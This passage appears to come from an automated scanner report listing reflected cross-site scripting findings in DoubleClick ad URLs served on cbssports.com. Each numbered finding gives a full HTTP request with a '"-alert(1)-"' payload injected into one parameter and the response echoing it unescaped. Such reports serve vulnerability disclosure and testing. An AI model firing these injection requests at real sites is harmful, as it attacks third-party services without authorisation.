This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=c402c"-alert(1)-"b9372fb4719&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:09:44 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=c402c"-alert(1)-"b9372fb4719&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque
...[SNIP]...

3.56. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [cpnmodule parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4967e"-alert(1)-"61439fec9d1 was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=4967e"-alert(1)-"61439fec9d1&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:09:22 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=4967e"-alert(1)-"61439fec9d1&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode =
...[SNIP]...

3.57. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [e parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2b25"-alert(1)-"c1a8f9ea9c2 was submitted in the e parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=a2b25"-alert(1)-"c1a8f9ea9c2&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:06:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
97/41882784/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=a2b25"-alert(1)-"c1a8f9ea9c2&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/http:
...[SNIP]...

3.58. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [epartner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86d72"-alert(1)-"3044e5f3dbb was submitted in the epartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=86d72"-alert(1)-"3044e5f3dbb&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:08:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=86d72"-alert(1)-"3044e5f3dbb&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl = url;
va
...[SNIP]...

3.59. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [event parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9555"-alert(1)-"c8daeff0702 was submitted in the event parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=c9555"-alert(1)-"c8daeff0702 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6942
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 27 Apr 2011 22:11:12 GMT
Expires: Wed, 27 Apr 2011 22:11:12 GMT

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
p=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=c9555"-alert(1)-"c8daeff0702http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "
...[SNIP]...

3.60. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59da1"-alert(1)-"eaf124f5b59 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn59da1"-alert(1)-"eaf124f5b59&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:01:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
/%2a/i%3B240391556%3B0-0%3B0%3B63194441%3B4307-300/250%3B41864997/41882784/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn59da1"-alert(1)-"eaf124f5b59&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.
...[SNIP]...

3.61. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [l parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 775c5"-alert(1)-"994e6e2c419 was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US775c5"-alert(1)-"994e6e2c419&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:03:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
6%3B0-0%3B0%3B63194441%3B4307-300/250%3B41864997/41882784/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US775c5"-alert(1)-"994e6e2c419&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht
...[SNIP]...

3.62. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [nd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84197"-alert(1)-"7be177ce9c5 was submitted in the nd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=2240884197"-alert(1)-"7be177ce9c5&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:05:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
307-300/250%3B41864997/41882784/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=2240884197"-alert(1)-"7be177ce9c5&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.
...[SNIP]...

3.63. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [o parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8102d"-alert(1)-"fa280264549 was submitted in the o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a8102d"-alert(1)-"fa280264549&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:00:31 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
7/169/%2a/i%3B240391556%3B0-0%3B0%3B63194441%3B4307-300/250%3B41864997/41882784/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a8102d"-alert(1)-"fa280264549&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193
...[SNIP]...

3.64. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [oepartner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9bd0"-alert(1)-"79bd7310a71 was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=b9bd0"-alert(1)-"79bd7310a71&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:07:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 -->
